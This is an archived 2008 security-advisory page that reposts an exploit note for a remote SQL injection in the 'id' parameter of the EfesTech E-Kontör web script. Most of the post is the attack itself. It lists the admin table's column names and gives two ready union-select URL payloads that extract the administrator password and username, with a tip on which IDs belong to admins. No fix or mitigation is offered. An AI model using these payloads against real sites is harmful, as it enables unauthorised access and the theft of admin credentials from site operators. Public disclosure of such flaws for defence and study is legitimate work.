Computer Security

Security Advisory: EfesTech E-Kontr (id) Remote SQL INJECTION
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [DSECRG-08-022] Multiple Security Vulnerabilities in Bolinos 4.6.1

  Cuteflow Bin v1.5.0 Local File Inclusion Vuln

  e107 My_Gallery Plugin Arbitrary File Download Vulnerability

  aeries browser interface(ABI)
3.8.3.14 Remote SQL Injection

From:Dj_ReMix_20_(at)_hotmail.com <Dj_ReMix_20_(at)_hotmail.com>
Date:25.03.2008
Subject:EfesTech E-Kontr (id) Remote SQL INJECTION

##############################################################


$Author = RMx
$home page = www.coderx.org
$thanks = Dynamic , TR_IP , Liz0zim
$Script name = Efestech E-Kontör (tr)
$script test = http://www.aspindir.com/Goster/5145
$script sales = 750 YTL


##############################################################
// EfesTech E-Kontör (id) Remote SQL INJECTION

// Table names

id no = id
password : sifre
users = firma


exploit for password = ?id=-1%20union+select+0,sifre,2,3+from+admin+where+id=1
explot for usernames = ?id=-1%20union+select+0,firma,2,3+from+admin+where+id=1

NOTe = İD values 1  or 2 for admin

Bye

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru